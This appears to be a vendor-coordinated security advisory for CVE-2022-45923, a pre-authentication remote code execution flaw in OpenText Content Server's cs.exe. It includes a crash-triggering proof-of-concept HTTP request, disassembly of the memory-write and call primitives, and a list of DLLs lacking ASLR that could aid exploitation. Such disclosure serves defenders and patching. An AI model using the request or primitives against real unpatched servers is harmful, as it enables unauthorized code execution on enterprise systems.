Pre-authenticated Remote Code Execution in cs.exe (OpenText™ Server Component)

Vendor description

"OpenText™ Extended ECM is an enterprise CMS platform that securely governs the information lifecycle by integrating with leading enterprise applications, such as SAP®, Microsoft® 365, Salesforce and SAP SuccessFactors®. Bringing content and processes together, Extended ECM provides access to information when and where it’s needed, improves decision-making and drives operational effectiveness."

Source: https://www.opentext.com/products/extended-ecm

Business recommendation

The vendor provides a patch which should be installed immediately.

Vulnerability Overview/Description

1) Pre-authenticated Remote Code Execution in cs.exe (CVE-2022-45923)

The Common Gateway Interface (CGI) program cs.exe of the Content Server has a vulnerability, which allows an attacker to increase/decrease an arbitrary memory address by 1 and to trigger a call to a method of a vftable with a vftable pointer value chosen by the attacker.

The cs.exe does de-serialize (crack) the user provided data in the `_fInArgs` parameter, if the parameter `_ApiName` is set. During this de-serialization to a `class KOSValue` object, the function `obj_ref_cracker` can be called. This function tries to create a new `class KOSValue` object with an unknown class ID of `3`.

As the class ID is unknown the function returns an object of type KOSValueBaseClass instead of KOSObjRefClass, but the value of the class_ptr attribute of the new class KOSValue object is controlled by the attacker. This new object can then be used to increase/decrease arbitrary memory addresses and call methods of its vftable via the functions KOSValueBaseClass::AddReference and KOSValueBaseClass::ReleaseReference.

Proof of concept

1) Pre-authenticated Remote Code Execution in cs.exe (CVE-2022-45923)

The following request crashes the `CGI` binary cs.exe with an access violation exception - 0xC0000005 trying to read memory from address 0xAAAA+8:

POST /OTCS/cs.exe HTTP/1.1
Host: opentext-dev
Content-Type: application/x-www-form-urlencoded
Origin: http:// opentext-dev:8002
Referer: http:// opentext-dev:8002/ [...]


_ApiName=foo&_fInArgs=<@urlencode_all>A<1,?,'_ApiName'='SessionFree','_ConnectionName'=#AAAA>
<@/urlencode_all>

The implementation of the function `KOSValueBaseClass::AddReference` tries to execute the following instructions:

# KOSValueBaseClass::AddReference
00007FFC2195BCA0 | 4C:8BC1                  | mov r8,rcx                         | ?AddReference@KOSValueBaseClass@@UEBAXPEAX@Z
00007FFC2195BCA3 | 48:85D2                  | test rdx,rdx                       |
00007FFC2195BCA6 | 74 46                    | je llkernel.7FFC2195BCEE           |
00007FFC2195BCA8 | 803D E1331400 00         | cmp byte ptr ds:[7FFC21A9F090],0   |
00007FFC2195BCAF | 75 05                    | jne llkernel.7FFC2195BCB6          |
00007FFC2195BCB1 | F0:FF42 08               | lock inc dword ptr ds:[rdx+8]      |
00007FFC2195BCB5 | C3                       | ret                                |

The attacker controls `RDX` at 0x00007FFC2195BCB1, as the value is from `#AAAA` of the payload. This can be used as a `increase where 1` primitive and the same logic applies to the function `KOSValueBaseClass::ReleaseReference`, which can be used as a `decrease where 1` primitive. Furthermore, the method `KOSValueBaseClass::ReleaseReference` can be used to call an arbitrary code location.

# KOSValueBaseClass::ReleaseReference
00007FFC2195BD17 | B8 FFFFFFFF              | mov eax,FFFFFFFF                   |
00007FFC2195BD1C | 75 1D                    | jne llkernel.7FFC2195BD3B          |
# ........
00007FFC2195BD3B | 48:897C24 30             | mov qword ptr ss:[rsp+30],rdi      |
00007FFC2195BD40 | 40:32FF                  | xor dil,dil                        |
00007FFC2195BD43 | F0:0FC142 08             | lock xadd dword ptr ds:[rdx+8],eax |
00007FFC2195BD48 | 83F8 01                  | cmp eax,1                          |
00007FFC2195BD4B | 75 10                    | jne llkernel.7FFC2195BD5D          |
00007FFC2195BD4D | 0FB6F8                   | movzx edi,al                       |
00007FFC2195BD50 | 49:8BC8                  | mov rcx,r8                         |
00007FFC2195BD53 | 48:8B02                  | mov rax,qword ptr ds:[rdx]         |
00007FFC2195BD56 | BA 01000000              | mov edx,1                          |
00007FFC2195BD5B | FF10                     | call qword ptr ds:[rax]            |

Again, the attacker controls `RDX`. First the function decreases `DWORD PTR [RDX+8]` by 1. If the previous value is `1` it gets the `vftable ptr` via the instruction `mov rax, QWORD ptr [RDX]` and then calls the first method in the `vftable` ( the `destructor`): `call QWORD PTR [RAX]`.

There are .dll files (libaprutil-1 & libapriconv-1.dll) which are not compiled with the security flag Address Space Layout Randomization - ASLR enabled, which can be used to achieve remote code execution.

.\winchecksec.exe --json (get-item C:\OPENTEXT-22\cgi\*.dll) > .\checksec-results.json

cat checksec-results.json | jq -r '.[] | [.path, .mitigations.aslr.presence] | @csv'

"icudt69.dll","Present"
"icuin69.dll","Present"
"icuio69.dll","Present"
"icutu69.dll","Present"
"icuuc69.dll","Present"
"jsoncpp.dll","Present"
"libapr-1.dll","Present"
"libapriconv-1.dll","NotPresent"
"libaprutil-1.dll","NotPresent"
"libcrypto-1_1-x64.dll","Present"
"libexpat.dll","Present"
"libssl-1_1-x64.dll","Present"
"llcrypt.dll","Present"
"llisapi.dll","Present"
"llkernel.dll","Present"
"llresources.dll","Present"
"log4cxx.dll","Present"
"PocoFoundation.dll","Present"

Vulnerable / tested versions

The following version has been tested:

• 22.1 (16.2.19.1803)

The following versions are vulnerable according to the vendor:

• 20.4 - 22.3

Vendor contact timeline